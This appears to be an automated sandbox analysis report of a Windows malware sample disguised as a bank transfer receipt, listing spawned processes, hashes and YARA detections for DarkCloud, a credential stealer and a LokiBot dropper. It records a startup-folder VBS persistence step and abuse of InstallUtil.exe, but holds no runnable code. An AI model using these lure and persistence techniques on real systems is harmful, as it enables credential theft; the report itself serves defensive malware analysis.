                                      Vary: Accept-Encoding,User-Agent
                                      Content-Type: video/mp4


                                      Target ID:0
                                      Start time:02:56:54
                                      Start date:19/02/2025
                                      Path:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe"
                                      Imagebase:0x280000
                                      File size:2'084'352 bytes
                                      MD5 hash:365DBE320E1CAD52761BE88C423D63B3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2118219479.0000000006700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:56:57
                                      Start date:19/02/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x550000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:02:56:58
                                      Start date:19/02/2025
                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0xd60000
                                      File size:418'304 bytes
                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:57:07
                                      Start date:19/02/2025
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
                                      Imagebase:0x7ff6c4010000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:02:57:08
                                      Start date:19/02/2025
                                      Path:C:\Users\user\AppData\Roaming\IsClosed.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\IsClosed.exe"
                                      Imagebase:0x370000
                                      File size:2'084'352 bytes
                                      MD5 hash:365DBE320E1CAD52761BE88C423D63B3
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 35%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:02:57:11
                                      Start date:19/02/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x380000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true
